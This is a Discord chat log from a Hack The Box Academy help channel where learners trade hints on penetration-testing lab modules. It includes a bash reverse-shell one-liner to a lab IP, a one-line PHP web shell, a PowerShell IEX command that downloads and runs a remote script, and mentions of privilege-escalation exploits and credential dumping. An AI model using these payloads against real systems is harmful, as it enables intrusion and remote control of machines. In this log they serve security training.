#modules

and ma ke sure that u are using the right ip addres

n00b question: in the Web Requests -> POST module, I'm struggling a little bit with completing the exercise. The prompt is "Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php' ", which I've done as far as I can tell but am not seeing the flag. As far as I can see the command works (and I can query on cities and get a result), but if I look for 'flag' (or variants) or any obvious flag segments (e.g., '{"search":"HTB"}') I get nothing back (same response as if I search for a nonsense term, which I take to mean that there are no matches to my query in the databse). Do I need to do something to get the flag inserted in that database for me to pull out (as in the API section that follows?)

Im trying to access to rdp y have this issue somebody know how to solve it?

I am just trying to recreate what is in the instructions in this module before i try going for the flag but im doing the exact same thing but not getting the same results

https://academy.hackthebox.com/module/134/section/1206

like i have the dtd file, and have the code the same but its not grabbing the information

i tried finding the flag the other way suggested in the module but got no dice

Hi guys I leave my contribution since it cost me a little to do it and I want to share it module || Bash scripting || question --> Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints the number of characters of the 35th value generated from the variable "var". Send the number as a response.

You have a typo in the IP address

Thank you, however, sharing solutions to modules that are not tier 0 is not allowed

I will keep this in mind for the next one 🙂

@vivid igloo Thanks! It works. I onle need to be patient. Shell does´nt open inmediatly. Need to wait few time to receive reverse shell. That was the initial problem.

still geting same result ugggg :(

Hello who can i contact about having VPN problems and its not connecting. Thanks

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

ducking shit the last question was mean ... hate you all

is anyone's burp suite > open browser taken an extremely long time to load the machine target's IP?

fixed. went to normal firefox browser and it seemed to work fine through that.

are you getting a host error

No, I'm getting nothing. It just loads.

I'm using pwnbox as well.

Windows file transfer methods!!
Hey everyone, I have a couple questions about this module, I have finished all exercises and understand everything, it’s pretty straight forward.
With that being said, I wanted to practice a little more at the end and decided to go through some of the power shell examples and also the SMB upload example. None of the methods described from the course work are working properly. I am getting a ton of powershell errors when trying the SMB upload methods, along with the powershell web uploads. I have tried the suggested powershell “error” fixes in the course work but that didn’t do anything. Has anyone experienced the same issue?

whats the actual commands you're using

send screenshots of the errors and what not

The command I used is directly from the course -> PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

Can someone please help me out with the last bit of the DNS module, im trying to find out "What is the FQDN of the last octect that ends with x.x.x.203"

The hint is "Remember that different wordlists do not always have the same entries." and i have tried a load of other wordlists but nothing is getting me the answer

You have to use a specific word list

One sec.

I have tried all the ones in Seclists/DNS/ directory

Using dnsenum right?

yup thats the one

Also you can brute force sub domains found in DIG -AXFR zone transfer

Have you checked those out?

I think i get what you mean

I believe I have done that

and stumbled across in*****l.inlanefreight.htb

try ones like dev.inlanefreight.htb

okay ill try that

Look at some of the discussions like this -> https://forum.hackthebox.com/t/what-is-the-fqdn-of-the-host-where-the-last-octet-ends-with-x-x-x-203/268809 I dont want to give you the answer but many forums like this will help with hints.

awesome thank you so much

I'll try a bit harder and see where I get

I need help in attacking common services module in sql databases section can someone tip me does the password is in some of the databases available

I stuck in this section

got it!

thanks @obtuse quest

No problem! that was a bit too tricky. Glad to help, I remember it gave me issues as well

||responder|| is your friend

am doing Linux Local Privilege Escalation - Skills Assessment and i have Meterpreter 2)(/root) > and i am totelly lost where to find first flag

First question?
Submit the contents of flag1.txt

yes yes

which dir should i dig in

Log in with the given creds via SSH and use ||find||

This was part of the first section. You can use find, locate, or grep to locate the flag

for the last couple of days, when i try to xfreerdp to a machine i get a black screen and an error stating 'certificate verification failure'. i've restarted the box, ive restarted my machine, but no luck. any ideas? command i run is xfreerdp /v:10.129.157.96 /u:'htb-student' /p:'Academy_student_AD!'

xfree was working fine up until yesterday

it is actually messed up

non works

nither grep nor find

gotcha, so just need to wait for HTB to fix it?

i used it already with the user htb-student

try it like that
xfreerdp /v:10.129.157.96 /u:'htb-student' /p:'Academy_student_AD!' /cert-ignore /tls-seclevel:0 /timeout:80000

Try “locate flag.txt”

find works 😉

thank you, will try

It’s not flag1.txt

I can't understand what should i do

still no luck : find / -name "flag.txt" 2>/dev/null
htb-student@nix03:~$

read the post from jp3g

whats the commands that u used ?

find

why it's not giving me the flag then

because your command is incorrect

find / -name flag1.txt

?

is this wrong ?

?

jp3g has told you that the file is not called flag1.txt.

Try it with wildcards

Submit the contents of flag1.txt
?

For some reason I cannot reach the vHosts:
vHosts needed for these questions:

app.inlanefreight.local
dev.inlanefreight.local

this is in the active infrastructure identification.
the target IP provides info on dig/ns/whatweb etc, but those two vHosts give me nothin but cant resolve.

did you list them in the hosts file?

DNS BUNNY I CALL TO YOU AGAIN

ahhhhh

Correctly recognized, it is about the name resolution.

where was the hosts file again? etc/avahi/hosts?

Use wildcrads to find the file.

Linux: /etc/hosts

Windows: depends on the version

I got stuck on this

https://academy.hackthebox.com/module/147/section/1639

Connect to the target machine using RDP and the provided creds. Export all tickets present on the computer. How many users TGT did you collect?****

I used mimikatz to dump the TGT, and submit the number of TGT, and it is incorrect..

@acoustic owl what to do with responder

Better get back to the section content and read the following to have a better grasp on what to do with responder

How many users TGT did you collect?

oic, thanks

https://academy.hackthebox.com/module/113/section/1214

someone got dehashed to work?

The git repositories I installed don't work

Hi everyone! Do you know how I can recover a file while connected to another with evilwinrm?

You do not need this tool for this task

Rdp seems broken

Doesn’t work on pwnbox nor my kali vm

could u give me a hint?

am trying to get the mail for Charles Smithson

In the module you will find creds to log in. Try it with this

I tried that

maybe I needed to write the password manually

In the password attack module the lab_hard i found a logins.kdbx file, and just want to know if i do things properly. I convert the file with keepass2john and then i use the mutated password file to crack the file

got it now ty

If you have done everything correctly, cracking the password should take less than 5 minutes.

oh my my. now I cannot find inlanefreight.htb on active subdomain enumeration.
tried nslookup:
nslookup -query=A inlanefreight.htb
Server: 1.1.1.1
Address: 1.1.1.1#53

** server can't find inlanefreight.htb: NXDOMAIN

used Dig and got:

dig any inlanefreight.htb

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> any inlanefreight.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14448
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;inlanefreight.htb. IN ANY

tried adding the target ip in etc/hosts with inlanefreight.htb as the name.

u need to mount the vhd

i used evilwinrm to dowload the file, That's the only thing I'm not sure about.

to transfer the file ?

nvm u will now when u have to do that

i thought u was ahead mb

u just have to crack the password

and open the file

And again DNS: htb is not an official TLD. The public resolver cannot resolve this domain.

is it normal that the hash is different when i download the file with winrm ?

Hi! I’m stuck in the getting started module, in the knowledge check section. It’s a Getsimple CMS app (I already know the version too) and I have the administrator credentials, but I want to upload a shell file but the upload file button isnt working (because of flash player). Any help?

yeah figured adding this one to etc/hosts would fix that, but it doesn't work. Tried looking for the NS. it no work either.

DNS strikes again

No, that can't work.

To resolve a domain that does not have an official TLD, you must ask the authoritative server directly.

not sure but i think it shouldn't

i just transfered the file with smbserver

ah so it would be like: dig any inlanefreight @ip addr

Hi, I am doing Windows Fundamental Module. One of the question was asked ( What is the name of the service associated with Windows Update? ). Does anyone know what is the service associated ? I tried google but failed.

Exactly
Take a look at the process of a DNS query.
Client asks resolver.
Resolver asks root name server who is responsible for the TLD.
If you now request a TLD like htb, the root name server does not know who is responsible. It does not know this TLD.

makes good sense I would say

lmao just see this twitch live from OffSec
kinda familiar with this, where I have been see this before? 🧐

so you have created a smbserver with impacket in your machine and transfered the file from the remote machine to the smbserver ?

You can record such a query with Wireshark on a resolver and then look at exactly what happens

Shoot lets do it im going to run one right now

it is hard to do that imo, text always more detail than video, and video makes you slower the progress to learn from my experience...

Nobody?

After all, the lessons are structured in such a way that the module teaches you the knowledge, but then you have to apply the knowledge you have learned and not just copy and apply commands.

With a video, exactly this concept would be lost.

is it just not showing you anything when you press the button? have you tried navigating to the index page, looking for uploads, and checking if it was uploaded without giving you any feedback?

Yes, and there is no way of upload a file

Try it with ||metasploit||

I will try some scripts of metasploit db, but I want to do the manual way

metasploit is work as I remeber, I did it few days ago'

What should the video show you that the text does not?

What is this script?
A module is not installed on your machine

pip is from python 3
For your Script you use python 2

If you want to watch video, check out ippsec's videos. He explains his procedure in his videos.

last question : Should i have to use the mut_password list to crack the keepass file ?

Look at the output, then you know what was done.
I have marked the places in yellow

Note: pip 21.0, in January 2021, removed Python 2 support, per pip’s Python 2 support policy. Please migrate to Python 3.

https://pypi.org/project/pip/

@acoustic owl Ty i found the keepass but now when i try to log in smb i can't

hey i am new here

i want to know abut this world of hacking

AFAIK - Pip was just symlinked to the operating systems default python version. Not necisarrily python2.

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

ok tq

im doing web proxies skill assesment and doing lucky.php

im trying this

ive setn it like 30 times

but i never get the flag...

Few things here. It looks like you've combined a GET and POST, and you have a / after your php target.

also also its rng so you could theoretically do it like a 1000 times and be unlucky and never get it lul

personally id cheat and use ffuf but pipe it through burp to capture the requests, filter out by size and then kick back and wait for the flag

i've put POST and did php?gf=true

but nothing lol

i've also added an HTB match when i get flag

but shi

its the only flag ion have lol

Why u did this ?

You have combined a GET and POST request ?

If you want to send a POST request delete parameters getXXX=true after / and write it in the end of the request

it sounds so strangely

Anybody done the Firewall and IDS/IPS Evasion - Easy, Medium and Hard Labs within the Network Enumeration with Nmap module - Struggling to get the right nmap switches, so was wondering if someone could clarify the evasion tactics?

Cheers!

Hi all. I am having trouble with void challenge lab on HTB. Can you help me the walkthrough for this lab. Thank you very much

Better ask in channel #challenges

I don't have permission to access this channel. How can i access it?

use ur api

to indentify in the discord

Module: File Inclusion
Section: PHP Filters
Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer

I think this question may be worded poorly. The module talks about fuzzing directly off of ip:8080/FUZZ

but- theres nothing there

can anyone give me a nudge on this

I suspect what they actually want you to do is fuzz the LFI location, which the module does not cover

Read #welcome

for other PHP scripts ?

/FUZZ.php ?

Hello folks. I finished the MSSQL part of the Footprinting module. But I can't make the suggested nmap scripts to work. The nmap MSSQL scripts seems to be broken. I even updated nmap and still not working. I try to do something similar in my own Kali box (was using PWn box) and still does not work.

I try to not use metasploit too much and rely on nmap when I can, hence my interest in knowing what's wrong.

PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2019
|_ms-sql-config: ERROR: Script execution failed (use -d to debug)
|_ms-sql-empty-password: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-dac: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-tables: ERROR: Script execution failed (use -d to debug)
|_ms-sql-dump-hashes: ERROR: Script execution failed (use -d to debug)
|_ms-sql-hasdbaccess: ERROR: Script execution failed (use -d to debug)
|_ms-sql-xp-cmdshell: ERROR: Script execution failed (use -d to debug)

I get all these "debug" errors

try clear update of nmap

You mean, updating nmap?

I think I did it.

i was just checking online and lots of people were having issues due to older version

suggest removing it and doing a clean install of nmap

also upgrade the OS

You are the man! Thanks @iron plaza . Removing, Updating Os, then reinstall, fixed my problem. I was just updating nmap.

Can I dm someone about the Attacking Common Services Easy lab, I am at the last step but I keep getting errors?

https://academy.hackthebox.com/module/113/section/2139

Attacking Common Applications - Thick client applications

Do I need procmon?

I am able to upload the shell via sql but I am stuck at a white screen when navigating to it.

You can Dm me

OSINT: Corporate Recon
Question: Which version of WordPress is used on the Inlanefreight domain page? - Technologies in Use

I believe this question is broken.

I have had no trouble with the tricks in this module, and i dont think this one is a trick.
@rustic sage

If someone has the answer to OSINT: Corporate Recon Wordpress version, may I dm you please?

Ive now completed everything but this question. Would really appreciate the help.

Yes

press enter

DM, if you still need help

This can be solved with enter. But another problem is with some windows boxes explorer will keep closing automatically every few minutes. It's extremely annoying.

Yeah some boxes are a real mess unfortunately.

I do everything but i don't have permissions to do this

This section is so dumb and unreal

Could you be more specific for “I don’t have permissions to do this”? What permissions you don’t have?

For exec master..xp_subdirs

To capture the ntlm hash with responder

I'm going to message you in private

?

Ok

anybody, please?

Active Directory Enumeration & Attacks
Bleeding Edge Vulnerabilities
Print Nightmare vuln
I've started the listener
I've hosted the DLL
When i attmpte to execute the exploit
It auths to the SMB server just fine - but I get an error of ERROR_FILE_NOT_FOUND - without and real description as to what file.
ANy help appreciated

And ofcourse - After hours of smashing my head I work it out within 5 seconds of posting to discord >.< hahaha

Could I get a sanity check on the first skills assessment for “Active Directory enumeration and attacks” for the question that asks me to find a users clear text password? Using blo** hou** I figured out the user, and the attack they can perform but I’m unable to find the clear text password. I used snaffler to search but it’s come back empty. I am on the right path to be looking for plain text files?

Also search for all shares and they came back with nothing useful

Been manually searching as well but that’s not doing good either t

Hi need help with this tiny thing:
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

based on my understanding of FQDN I can't find the ans that the box accept

The FQDN of the NameServer is searched for

mind if I bother you in DM ?

NP, send me a DM

hello everybody

i tried to ping app.inflanefreight.local but its not working and i added the host to to vi etc file. still not working

does sb why?

Are u on the vpn?

And specifically the academy vpn?

10.10.15.159

In which file did you enter the Host and IP?

vi etc/host

vi is the editor and not the file 😉
etc/ or /etc/?
/etc/host or /etc/hosts?

I just want to make sure you made the entry in the right place

it was etc/hosts

is there diffrence ?

etc/host = relative path so if there is an etc folder in ur current directory then it will edit there. /etc/host is the absolute path which points to the correct file

i added etc/host still isnt workin

can you just cd /etc/ and then ls and show us if the hosts file is there.

Then cat the hosts file to show us what's inside it

I'm not sure if you accidentally made duplicates, deleted the file, overwrite it or what, but just do that to be sure

issue should be resolved, OP mispelled inlane as inflane

this is why i always ask for screenshots

?

is bro deleting his own messages

nvm.. yes i am.

u solved it?

yes... i forgot to also add the domain name to the hosts file in addition to the dc name

just got it to work

nice, issue resolved

i like when i can resolve myself.. lol

its always when you ask for help, do you fix it urself

hello somebody know to express GiB in format:000?

hello somebody know about the last question about splunk module and intro section?

Can somebody help me with attacking dns section in attacking common services module

What does not work?

Dns zone transfer

I found subdomains and try on every of them

It gives me transfer failed

I also add ip and domain in /etc/hosts file also didn't work

There are zones that do not allow zonetransfer from anyone (depending on configuration)

Yes i know

But how to get the flag

The Hosts file is there to allow name resolution of individual hosts.
But you want to do a zone transfer. The Hosts file can't help you there.

I do this to check everything to get to work

I do everything and nothing work

https://academy.hackthebox.com/module/113/section/2139

Attacking Common Applications - Attacking Thick Client Applications -- I cannot even do the first step, someone could help me please.

What exactly is the Problem? You have to pretty much do exactly what is shown in the module

I cannot intercept the restart oracle service

with procmon

And it doesn't create the .bat file in cybervaca either

hello guys, sorry for bothering you but can I get a hint
https://discord.com/channels/473760315293696010/1122139635452215399

I'm stuck in module "ACTIVE DIRECTORY ENUMERATION & ATTACKS" part "Credentialed Enumeration - from Windows" the question is "What is the password for the database user?", what method should I use to find it?

What should i do

.

Try the ones you learned

In the section

Can I get some help on getting my shell to work in the Attacking Common Services Easy lab? I am very close but keep getting a white screen with sql, or an error with ftp.

I did not get any cubes after the HTB Season ends how to fix that?

@urban sage

Hi, I'm on "Getting Started" - public exploits. So I found exploit: scanner/http/wp_simple_backup_file_read
I've changed rhosts, rport and filepath as it should be, but when I run exploit I can't see that any file has been saved on my VM. Do anyone know why that might be?

Contact support via the site.

ok 🙂

Someone can help me please

Hi there

I need help if someone can help please dm

Hi @acoustic owl . Stuck on the Nessus skills assessment in the Vulnerability assessment module. Followed the instructions and my completed scan looks like this (see screenshot). Am I on the right track? I can't seem to answer any questions with the output provided. Any hints would be appreciated.

Can someone help me

what is the question you need help with?

It’s not a question I need help with something

No I’d rather not

I thought was correlated to any of the academy modules

Do you mind if we discuss this privately l

Please

I sent a dm plz answer it

Some help please dm me

https://academy.hackthebox.com/module/113/section/2139

Attacking Common Applications - Attacking Thick Client Applications -- I cannot even do the first step, someone could help me please.

does anybody complete the section attacking dns in attacking common services module because i need help

Thanks, but which one I'm still stuck.

Hey,

I'm stuck on the BloodHound skills assessment, the last question,

Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).

I tried to follow the below link [0], and tried to issue the following query:

MATCH (totalUsers:User {domain:'INLANEFREIGHT.HTB'})
MATCH p=shortestPath((UsersWithPath:User {domain:'INLANEFREIGHT.HTB'})-[r*1..]->(g:Group {name:'<FAILD THIS????>'}))
WITH COUNT(DISTINCT(totalUsers)) as totalUsers, COUNT(DISTINCT(UsersWithPath)) as UsersWithPath 
RETURN ROUND(100.0 * UsersWithPath / totalUsers * 100) / 100 AS percentUsersToGlobalAdmins

But I guess I failed FAILD THIS???? in the above query, can anyone help me or give me a hint?

thank you in advance 🙂

[0] https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/

I have my webshell on the Attacking Common Services easy lab, but I am unabl to turn it into a reverse shell. Can I get a nudge on this?

any reason im getting this error?

are you sure that user has access to DC01?

its for the protected files section on password attacks

what did you try so far?

looks like the install of ssh2john is broken there. if you can, try it on your own vm instead

I have tried: from the web shell, creating payload with msfvenom, and then trying to call the file from the webshell and catch it with a netcat listener. I have also tried using reverse shell generator, and uploading the code through the sql method but I am getting errors.

ok thanks will do

I can see the files uploaded to the target but I dont think I am calling them correctly

well calling would just be accessing the file similar to the webshell, no?

when I go to navigate to it, it just attempts to save the file to my attack host for some reason

umm what

well yeah it's an exe file. windows knows how to execute these, but the webserver doesn't

but since your webshell is working, you know a way to get the webserver to execute stuff 😉

I have been trying other methods, but it doesn't seem to be working, it just hangs up... can I dm you the screenshot, I dont want to spoil it?

sure

@long grove please stop dming me questions and ask here. I am not accepting dms

you still need another set of credentials that you haven't found yet. bloodhound can help you out here

I stuck in password attack the assessment easy one

https://academy.hackthebox.com/module/147/section/1334

Examine the first target and submit the root password as the answer.

I am not sure whether this is right or not

sure thing 🙂

this won't work. try finding a foothold first and then go from there

how?

u dont find the root password first

u can get someone elses credentials first

there may be other users to go after with easier passwords

idk if thats tmi

Not tmi. :)

I only know root as user

Then maybe you need to look for other users

indeed, but that shouldn't stop you

PM?

Anyone have any hint or clue as to how to find the flag in the Containers section in the Linux Privilege Escalation module? I was able to elevate my privileges to root as the section shows, but I've looked everywhere for a flag.txt file and I can't seem to find it anywhere.

could it be a permission problem?

ive restarted the box new ip new everything and im getting the same response

Never mind. I found it.

Use the resources from the module

I'll test in a minute but I'm pretty sure it should work the way you did it

I tested it and I ran into the same issue. not sure what the problem is tho

any chance you know who to tag for pwnbox fixes? figured out what the problem is but dunno who could fix it

to fix it, replace decodestring with decodebytes. decodestring has been removed in python 3.9

Use python 2.7

that works too I guess

Ssh2john has not been updated to python 3.x so you need to either update the code manually or install python 2.7.x and use that

¯_(ツ)_/¯

i really appriecate you going out of ur way to help me

thanks mate

well the kali ssh2john is fixed 😄

it uses b64decode instead

it worked

Hello I have the problem with Linux Privilege Escalation at section Logrotate
stuck at Waiting for rotating access.log...
the command i using: ./logrotten -p ./payload /home/htb-student/backups/access.log
I also tried to add some short content to access.log, and i saw there is new access.log.1,2,3,4,5.... But There is nothing return to netcat that I open for listener
here is the payload i using: /bin/bash -i >& /dev/tcp/10.10.14.79/4444 0>&1
need help!

thanks

sure thing 🙂

Took me a long time to complete this.
Thanks to goat @acoustic owl for helping me along the way 😄

congrats 🎉

https://tenor.com/view/jumping-kid-jumping-baby-goat-cute-kid-excited-gif-14331721

Could I get a hand with attacking common services - hard? ||I can't login to the SQL server as F outside of the management studio, I get errors using sqsh, mssqlclient & sqlcmd! Am I missing something?||

https://academy.hackthebox.com/module/113/section/2139

is this a common thing and how would i know if thats the problem just for future reference

Attacking common applications -- both sections of attacking thick applications. I am not able to complete them, I have been trying it since yesterday.

just one more section and I'll be in the same boat 😅 z

I am just missing that two sections to complete the module

but it is not really good explained

Which question

login bruteforcing
skills assessemnt service login

brute force ssh server

I am using username-anarchy to generate the username list, and I used cupp with just the first and last name of the user. added numbers at the end and also special characters.

I cant get anything to hit. Can someone give me a nudge

impersonating j*** Once logged in, what other user can we compromise to gain admin privileges?

you are doing hard right? There are 4 questions.. which one are you doing right now?

I'm trying to compromise the user

@gusty zinc you need to include almost no information in cupp for that user. start with the bare minimum & then use the password policy

Do you have F** creds?

yes

try for mssql with those creds

I did, I get errors

Which section?
you have to share what have you done so far and the question you stuck on. otherwise it will be hard for others to help you

whats your command?

can I dm?

I don't want to go against rules

just dont share any creds

are you using mssqlclient?

yes

||mssqlclient.py -p 1433 .\f@10.129.XXX.XX||

just as I thought

there is 2 kinds of login, domain login and local login .

just completed using that - and got no hits

1 of 1 target completed, 0 valid password found

cupp just first and last name - added special characters and numbers

then used sed to do the password policy

if you did first name last name only then the cupp should be fine

do you want to add spec characters at the end of words?

yeah

something isnt right

its not working

my wordlist ends up being 77 passwords

ran again with no hit

If somoene has completed those and could help me please

Does anyone have any clues on how to get the logrotten tool to work in the Logrotate section in Linux Privilege Escalation? I'm running into issues with this section and getting the tool to work. I managed to transfer it to the vulnerable linux box but I can't seem to get it to give me a reverse shell.

it takes some time

try to open two terminels of the ssh

and then spin the logrotten and then try to echo hi >> access.log in other ssh terminal

ayo

am stuck with this one question in skill assesment Submit the contents of flag1.txt

Linux Local Privilege Escalation - Skills Assessment

just tell me one this is the flag is called flag1.txt

or flag.txt

because i tried all wind cards with find and still got non

@acoustic owl

it does not care the name

just do find /* -name "flag*.txt"

to do that

i did that already

still

the first flag is missing

i got all the flags

how would one get the notes.zip file from root

for the protected archives task

by geeting the right priviligies

i already have root privilege's and i already got all the flags

afaik kira doesnt have sudo privileges

can i get a hint lol

wdym ?

how do u get the right priveleges

by exploiting sudo

https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/local/sudo_baron_samedit

it was wayy too easy

Neither.
Remember that a flag can be hidden.

it's really embarrassing that i asked such question instead of focusing lol

No, it's not embarrassing and hey, it'll never happen to you again

yes sir more focused from now on 😉

is this the only way to do it?

no

check the kernel version

no as in sudo exploit?

use the tool we always use to exploit windows 7

u can run the exploit straight if thats whatchu asking

Okay, I'll give that a shot.

im still lost how are people getting the notes.zip file in the protected archives section

which module are u talking about ?

password attacks

sorry never even touched that module

i was gonna say theres no way it was a msf exploit

appreciate u trying to help tho lol

can anyone help lol

hi guys im almost finished learning the intro linux course

once i finish that what else do i need 2 learn so i can start hacking people

i am stupid nvm

"Which shell is specified for the htb-student user? "

wat is this question asking

mean like bash?

"Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)"

both ips are wrong?
https://academy.hackthebox.com/module/158/section/1428

the second one is close but not quite the answer

how would i go about getting the answer? there is no other route in the autoroutes list

if I'm not mistaken there is another equivalent representation for that subnet. take a look at the netmask, maybe you can make sense of what I mean

@heady tusk did u get complete thick applications?

nah not there yet

was hoping you could help me when I get there lol

I am in the skills assessment

without doing that two

ah well this is gonna be fun then xD

alright then, shellshock done, now on to the fun part lol

The Miscellaneous Techniques section in Linux Privilege Escalation isn't making any sense. It doesn't give an explanation on how to follow the steps in order to get the flag because it doesn't allow you to remote into the htb@NIX02 box and carry out the commands. Has anyone done this section and could give a hint on what exactly is needed here?

I solved the Attacking Common Applications Easy lab, but I don't think I did it either of the intended ways. Can I dm someone to see if I did it correctly?

if it worked, it was correct. 😉

There is no right or wrong in hacking

But send me a dm, then I can show you my way

Anyone confused with the Capabilities section of Linux Privilege Escalation? It says the binary has cap_sys_admin, but it doesn't in the example. I feel like I'm missing something crucial here.

this cant be right can it

its not unusual for labs to take a twist on the taught material and unintended paths are pretty rare, so most likely you did intended way

it can be, that whole module is a pita

if you did everything correctly go watch a tv show or something for 20ish minutes and come back

which is why I hate that module

lol ok

dont know if you did something wrong till after youve wasted like half an hour

yeah bit of a piss take i agree

someone could help me with those 2

I'm still not understanding what to do in the Miscellaneous Techniques section in Linux Privilege Escalation. Can anyone give me some assistance with understanding what is needed here? It just isn't making any sense.

Never mind. I figure it out.

Whats like the sweet spot for threads in hydra?

highly depends on the service you're bruteforcing. it'll usually tell you how much it recommends for the service it's running against

Hey people, I'm writing here cause I'm pretty desperate for some hints at this point, I've spent much more time that I would like to admit on the "Hacking Wordpress" module at the very final flag of the final section which demands: Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.
The closest I've got was using msfconsole and an exploit named wp_admin_shell_upload as suggested in one of the previous sections of the module, but every time i try to execute the run command it actually won't upload the payload and just crashes for some reason I really can't figure it out, would anyone help please?

you can do it manually.
As described in the module, edit the page 404

Unfortunately that is incorrect, if I try to do it manually when I click the button "update" on the theme, it says that the code can't be updated that way and I have to use ftp to edit the files

Finally got it https://academy.hackthebox.com/module/113/section/2139

ty for the help @heady tusk

Hello i keep getting sub failed for academy when i have enough fund to sub.help anyone ?

You might want to contact HTB support for that one. This place more for community help with modules rather than platform issues.

Thanks a lot have a nice day mate

In Active Directory Enumeration & Attacks, for skills assessment part II, I wasn't able to import the powerview module. Ive tried a few different methods but been unsuccessful. Is this intentional or do I just need to try harder? I feel like I need it to get the second user but maybe im just not living off the land enough

You add 2 | symbols next to each other at the start and end of the text u went to mask

I think the server decides what emojis are allowed? I’m not sure lol

Btw we’re u able to get power view to work on ms01?

I’m on same section as u

Which emoticon are u trying to use? I could see if it works for me

Yep works for me

Hold down on the message ?

Hm ok I’m missing admin creds then

I was thinking it had antivirus or something lol

Well I used the first user a**** creds and it didn’t let me run poweshell as admin

Maybe I mistyped something in the pop up. I’ve been up too long without sleep

U don’t have this?

Not there yet lol 🤧 I just got managed to get the password for the b*** user

I’m eating breakfast rn but I will come back in like 30 minutes

so you have pwn the DC01 and got the Administrator user hash but you are having issue logging in with that hash?

i think i have a typo in my note so give me a sec i'll double check some stuff and send you a dm

Does anyone has the same problem with machines in Windows Privilege Escalation Skills Assessment? I cant connect to them with vpn or pwn box. Machine is other parts of this module are working

In Attack common service - RDP Connect to admin machine using rdp in hint I know should use another way to log in without username an passwords so in ||registry editor I set Limit blank password to 0 but still accept password to log in || Can I find another way to log in or something wrong in my road?

if you are on the first Skills Assessment then there should be a ||website|| running on the target machine and if you are having connecting even on the pwnbox then check and make sure you don't have both your vpn and the pwnbox on at the same time

if you are trying to login with the ||hash|| then you are on the right path no idea about that error but i could be because of the ||DisableResrictedAdmin|| thing

Hello! Not sure if this is the best place to ask. I am doing the Getting Started module and I'm down to "Nibbles - Privilege Escalation". Up until this point I was able to get a reverse shell, but all of a sudden it started timing out. Whenever I access the image.php it just loads and times out. Does anyone know why? I was so close to getting the root flag and I'm stuck for a few hours on this. I've reset the target a few times but with the same result.

if you can still access the target web site and you are following the previous section to get a shell you can just try to upload a different image

I did but I am not receiving anything in my netcat listener

screenshots pls

whats in image.php

and if your shell keep dying try to get a better shell like a meterpreter shell

the previous setup show how you can get a shell with a images that have a payload

in this case reset your target and try again

could also be ur target expired

lol

I am using the reverse shell from pentestmonkey and I changed the ip and port.

this can be the case 🤣

Does anyone know how i can find this?

I have reset it several times, it's not expired.

can you curl the webpage

Look where mails are normally stored.

I tried curl and it doesn't show anything in netcat

motherfucker

no, just a normal curl get request to whatever page, does it show anything at all?

oi chill

and try to ask better question next time

"How do I earn money?" Go to where money is usually stored bro

you can just google where is mail stored in linux

or you can google it

People who want help but then insult those who try to help, those are the ones I like best

Do you mean something like this?

http://dontasktoask.com/ which module and secton you in? what is the question you are having issue with? and what did you try?

if your target are still running fine just upload a different payload and try again if you still get nothing try reset your target and use a different payload if the pentest monkey payload keep giving you issue

seems like the web page is responding.

You can upload a more simpler payload to add to what MRtom suggests.

I already did this. I tried with different reverse shells, I reset the target 3 times, same issue every time. I also tried with msfconsole to run the exploit and it says I need to manually adjust the image.php.

so your issue is the shell die after a few sec of you getting one right?

That’s one way to never get help again

@tulip jasper and by getting a meterpreter shell i don't mean using any exploit but i mean use the web delivery to get a shell

That's a shame. I wish there were other forums where help can be accessed

I have overthinking about this question to learn more -how can dump hash or pass the hash if I can’t access on suystem32/config/sam and no port open to move file and using PtH all of this give me access deny all it make me to thinking more …but I think should I dig more

The issue is that when I access the image.php, my netcat doesn't detect anything. It was working fine this morning. I was following the steps in the module.

the solution is a bit too obvious so i can't give you any hint here so i'll send you a dm in a bit

i found this but there is nothing else there

I'm not even kidding when i say, you can google this online and there's htb academy forum threads where people can help you, or have come across the same problem before.

from this screenshot the error that the payload is given is a timed out error so it's can't connect back to your nc listener so maybe double check your ip and port on the payload or use this payload to get RCE not shell: <?php system($_REQUEST['cmd']); ?>

I have no idea why you are being like this my guy.

How unfortunate

yeah i'd suggest a more simpler rev shell if a large one like pentestmonkey doesnt work

Hey there, anyone with some hints on this please: #modules message

https://forum.hackthebox.com/t/what-is-the-path-to-the-htb-students-mail/3793

please, next time don't get so mad (and toxic)

and for real try to ask better question next time if you want any help

I know, but my question is more to do with something else. The path to the mail is found in /var/mail. But didn't they specify that they wanted the mail belonging to the htb-student? It seems there are 3 user accounts on the computer, cry0l1t3 htb-student mrb3n. So how do we know who the mail belongs to in /var/mail since no user is specified

if that makes sense

did you read the post i sent you 😭

1sec

i mean to me the simplest payload is the one that give you RCE so if it work it work and there is no error to be debug or finding what when wrong and the next best thing is a python shell but putting that in to a php payload is going to make that not so simple any more

yeah ur not wrong

Usually if a large rev shell doesnt work, i simplify it.

Sometimes it's a lag thing due to academy being 300 ping for me XD

Really difficult to follow the replies. They get buried fast 😛 So it seems this is working fine. Trying to retrace the steps from "Nibbles - Initial Foothold", where it was working fine.

So smaller, simpler payloads help

yeah probably the payload is too big and takes too long to upload or whatever is going on behind the scenes.

You can use this to send a rev shell. (or whatever is the next step)

